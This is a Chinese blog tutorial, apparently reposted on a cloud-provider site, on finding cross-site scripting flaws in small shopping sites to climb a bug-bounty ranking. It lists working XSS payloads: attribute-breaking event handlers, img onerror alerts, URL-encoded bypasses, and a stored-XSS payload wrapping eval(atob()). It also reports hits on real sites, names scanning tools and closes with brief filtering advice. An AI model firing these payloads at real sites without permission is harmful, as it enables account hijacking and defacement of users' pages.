溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何利用xss漏洞shua盒子rank的

發(fā)布時間:2021-12-22 15:38:58 來源:億速云 閱讀:124 作者:柒染 欄目:網絡安全

這篇文章給大家介紹如何利用xss漏洞shua盒子rank的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

我們來挖小商城的xss,因為商城的xss輸入點多

01

第一步:

搜索框判斷:

onfocus=alert1 autofocus            

那兩個是反引號,實測可用,在不使用 ‘ ” ( )的情況下,但是一般都要閉合value的 "

“ onfocus=alert('1') autofocus ”

"onclick="alert(1)

"><img src=x onerror=aLert(1)><!--

%22><img src=x onerror=aLert(1)><!--    

(有趣的現(xiàn)象,url編碼能繞過簡單的反斜杠)

見招拆招了,一般都不會費盡心思過濾什么特殊的字符,都是直接函數(shù)過濾

真的過濾了,繼續(xù)看

1.輸入:


如何利用xss漏洞shua盒子rank的

事件判斷一波,博主兩次遇到一個商城cms,漏了兩個事件onuoload(頁面關閉時觸發(fā)),onbblclick(雙擊時觸發(fā))

2.常用的判斷一波:


如何利用xss漏洞shua盒子rank的

這都是常用的字符

3.特殊字符判斷一波

~!@#$%^&*()_+-={}|:"<>?[]\;',./

一般< > ' "  都過濾的了,有時也會漏下 ‘  ,作者也不是很清楚為什么

02

第二步

如果這簡單的搜索框都做的很好,那么自行考慮要不要繼續(xù)挖掘

作者遇到一個,注冊登陸后,它是一個選擇題,都過濾了的,但正確選項那個答案沒有過濾


如何利用xss漏洞shua盒子rank的

一般就這兩個就夠了

第三步

說這么多,來兩個簡單的實戰(zhàn)吧(難的,自己也菜的摳腳)

第一個,反射:

http://www.xx.com   

 (就不打碼了,就一個簡單的反射xss)

輸入

">

<img src=x onerror=prompt(1)

>


如何利用xss漏洞shua盒子rank的

輸入


如何利用xss漏洞shua盒子rank的

第二個,存儲xss

作者找了另一個網站當例子

1.搜索框反射

輸入

">

<img src=x onerror=aLert(1)>

<!--

如何利用xss漏洞shua盒子rank的

2.存在存儲xss

12">

</textarea>

 <img src=x onerror=eval(atob(''))>

<!--

如何利用xss漏洞shua盒子rank的


如何利用xss漏洞shua盒子rank的

按著作者的方法,只要你有耐心和時間,rank真的問題不大,有圖有真相,

如何利用xss漏洞shua盒子rank的

xss工具

1.github腳本

來自一位前輩的收集

如何利用xss漏洞shua盒子rank的

簡單測試過,把其他的腳本payload轉移到了BruteXSS里,其他的作者用起來效果不是很好(可能沒有找到使用方法吧)

就是上文的 prompt  (有點小瑕疵就是,誤報,誤報后就停止了,還在思考解決)

如何利用xss漏洞shua盒子rank的

2.xsser,kali自帶的一款工具,由于作者沒有研究過,就不擴展討論了

xss防御

作者的淺薄見解

很粗暴的方法:輸入實體化,敏感詞過濾

作者見過一個cms的過濾是這樣的,on開頭過濾掉(現(xiàn)在想來應該沒有過濾完),script,src,img,iframe,ifame等敏感可引入詞過濾,再加上輸入實體化

關于如何利用xss漏洞shua盒子rank的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI